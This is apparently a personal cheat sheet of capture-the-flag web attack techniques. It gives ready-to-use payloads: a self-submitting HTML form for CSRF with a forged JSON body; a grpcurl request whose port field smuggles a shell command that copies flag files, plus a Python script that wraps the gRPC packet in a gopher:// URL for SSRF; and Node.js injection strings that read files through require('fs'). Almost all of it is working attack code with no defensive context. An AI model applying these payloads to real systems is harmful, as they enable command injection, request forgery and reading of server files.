Web tricks

Web tricks

CSRF via JSON when content is not validated on target

Host file with contents

<html>
  <body>
	<form action="http://127.0.0.1:80/api/xxx" method="POST" enctype="text/plain">
		<input type="hidden" name='{{"status": "xxx","foo' value='":"b"}}' />
	</form>
	<script>document.forms[0].submit();</script>
  </body>
</html>

URL injection to grpc

Start wireshark and capture traffic from this request

grpcurl -plaintext -proto live_data.proto \
   -d '{"ip": "127.0.0.1", "port": "1337; cp /flag* /app/eldoria_api/public/flag.txt"}' \
   localhost:50051 live.LiveDataService/CheckHealth

Take GRPC parts from Wireshark and use this scripts to create plaintext url

def grpc_packet():
   # sniffed using tcpdump https://bkubiak.github.io/grpc-raw-requests/
   # grpcurl -plaintext -proto live_data.proto -d '{"ip": "127.0.0.1", "port": "1337; cp /flag* /app/eldoria_api/public/flag.txt"}' localhost:50051 live.LiveDataService/CheckHealth
   magic = "505249202a20485454502f322e300d0a0d0a534d0d0a0d0a"
   settings = "000000040100000000"
   headers = "00007c010400000001838645986283772af9cddcb7c691ee2d9dcc42b17a7293ae328e84cf418ba0e41d139d09b8d800d87f5f8b1d75d0620d263d4c4d65647aa59acac96d9431217bad1da6a2453faa8ea772d8831ea51054ff6a4d65645a63b015db75707f40027465864d833505b11f408e9acac8b0c842d6958b510f21aa9b839bd9ab"
   data = "000042000100000001000000003d0a093132372e302e302e311230313333373b206370202f666c61672a202f6170702f656c646f7269615f6170692f7075626c69632f666c61672e747874"

   packet = magic + settings + headers + data

   encoded_packet = ""
   for i in range(int(len(packet) / 2)):
   	encoded_packet += "%" + packet[2*i:2*(i+1)]

   return f"gopher://127.0.0.1:50051/_{encoded_packet}"

print(grpc_packet())

We should get url like

gopher://127.0.0.1:50051/_%50%52%49%20%2a%20%48%54%54%50%2f%32%2e%30%0d%0a%0d%0a%53%4d%0d%0a%0d%0a%00%00%00%04%01%00%00%00%00%00%00%7c%01%04%00%00%00%01%83%86%45%98%62%83%77%2a%f9%cd%dc%b7%c6%91%ee%2d%9d%cc%42%b1%7a%72%93%ae%32%8e%84%cf%41%8b%a0%e4%1d%13%9d%09%b8%d8%00%d8%7f%5f%8b%1d%75%d0%62%0d%26%3d%4c%4d%65%64%7a%a5%9a%ca%c9%6d%94%31%21%7b%ad%1d%a6%a2%45%3f%aa%8e%a7%72%d8%83%1e%a5%10%54%ff%6a%4d%65%64%5a%63%b0%15%db%75%70%7f%40%02%74%65%86%4d%83%35%05%b1%1f%40%8e%9a%ca%c8%b0%c8%42%d6%95%8b%51%0f%21%aa%9b%83%9b%d9%ab%00%00%42%00%01%00%00%00%01%00%00%00%00%3d%0a%09%31%32%37%2e%30%2e%30%2e%31%12%30%31%33%33%37%3b%20%63%70%20%2f%66%6c%61%67%2a%20%2f%61%70%70%2f%65%6c%64%6f%72%69%61%5f%61%70%69%2f%70%75%62%6c%69%63%2f%66%6c%61%67%2e%74%78%74

RCE via NodeJS

Use require

require('fs').readFileSync('flag.txt', 'utf8')

If it fails, use it in this syntax

global.process.mainModule.require('fs').readFileSync('flag.txt', 'utf8')